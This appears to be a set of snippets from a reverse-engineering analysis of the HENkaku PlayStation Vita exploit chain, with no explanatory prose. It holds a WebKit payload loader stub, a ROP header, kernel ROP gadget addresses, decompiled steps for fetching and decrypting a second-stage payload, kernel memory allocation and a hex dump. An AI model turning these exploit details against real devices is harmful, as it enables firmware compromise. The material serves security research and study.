hexkyz

<script src='payload.js'></script>
 
<script>
var r, a, e, t, n, o, l, i, f, v, s, c;
var u, y, w, p, d, g, h, k, b;
var A, U;
 
var m = 0x40 + payload[16/4];  /* 0x40 bytes for ROP header + 1840 bytes for stack*/
m /= 4;                /* 476 */
 

hexkyz

[HEADER] (0x40 bytes)
0x524f507e -> ROP~
0x01000100 -> Version
0x00000000 -> NULL
0x00000000 -> NULL
0x00000730 -> No reloc
0x00000000 -> NULL
0x00000000 -> NULL
0x00000000 -> NULL
0x000003F8 -> No reloc

hexkyz

// Kernel ROP chain
/*
scesysmem_base + 0x00000347
POP             {PC}
*/
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031    // PC

/*
scesysmem_base + 0x00000031
POP             {R0,PC}

hexkyz

// Copy SD card device path and param
strcpy(x_stack + 0x000086B4, "sdstor0:");
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");

// Clear devctl 0x05 outbuf
// From x_stack + 0x00006F34 to x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);

// Copy dummy device path
strcpy(x_stack + 0x000086E4, "molecule0:");

hexkyz

strcpy(stack_base + 0x000086B4, "sdstor0:");
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext");

// Do stuff
...

strcpy(stack_base + 0x000086E4, "molecule0:");

SceLibKernel_a4ad("molecule0:");
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014);

hexkyz

// Do stuff
...

// Create a new thread for the second payload
int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000);

// Do stuff
...

// Construct the arguments for fetching the second payload

hexkyz

// Allocate a new memory block
char* memblock_name = "Magic";
uint32_t memblock_type = 0x1020D006;
uint32_t memblock_size = 0xA0000;
void* memblock_opts = 0x00000000;
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0);

// Retrieve the memory block's address into a buffer
uint32_t *out_buf;
kern_memblock_getaddr(memblock_id, out_buf);

hexkyz

// Entry point
sub_00000010(scesysmem_base, payload_addr)
{
    r4 = scesysmem_base
    sub_00000356();

    r5 = scesysmem_base >> 0x20
    sub_0000035A();
   
    // Decrypt and launch HENkaku's payload

hexkyz

0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43

hexkyz

0x00000000: 00 02 20 9F 80 05 08 00 E0 59 00 00 97 11 49 00
0x00000010: A8 05 30 00 80 05 08 00 00 00 00 00 09 50 49 00
0x00000020: 00 C9 21 00 00 C9 21 00 C0 8B 21 00 80 A5 21 00
0x00000030: C0 8B 21 00 80 A5 21 00 00 B2 20 00 C0 65 20 00
0x00000040: 00 B2 20 00 C0 65 20 00 C0 65 20 00 C0 65 20 00
0x00000050: C0 65 20 00 C0 65 20 00 C0 21 20 00 C0 65 20 00
0x00000060: C0 21 20 00 C0 65 20 00 00 47 20 00 00 47 20 00
0x00000070: 00 47 20 00 00 47 20 00 C0 95 20 00 00 47 20 00
0x00000080: C0 95 20 00 00 47 20 00 40 0B 20 00 40 0B 20 00
0x00000090: 40 0B 20 00 40 0B 20 00 40 31 20 00 40 0B 20 00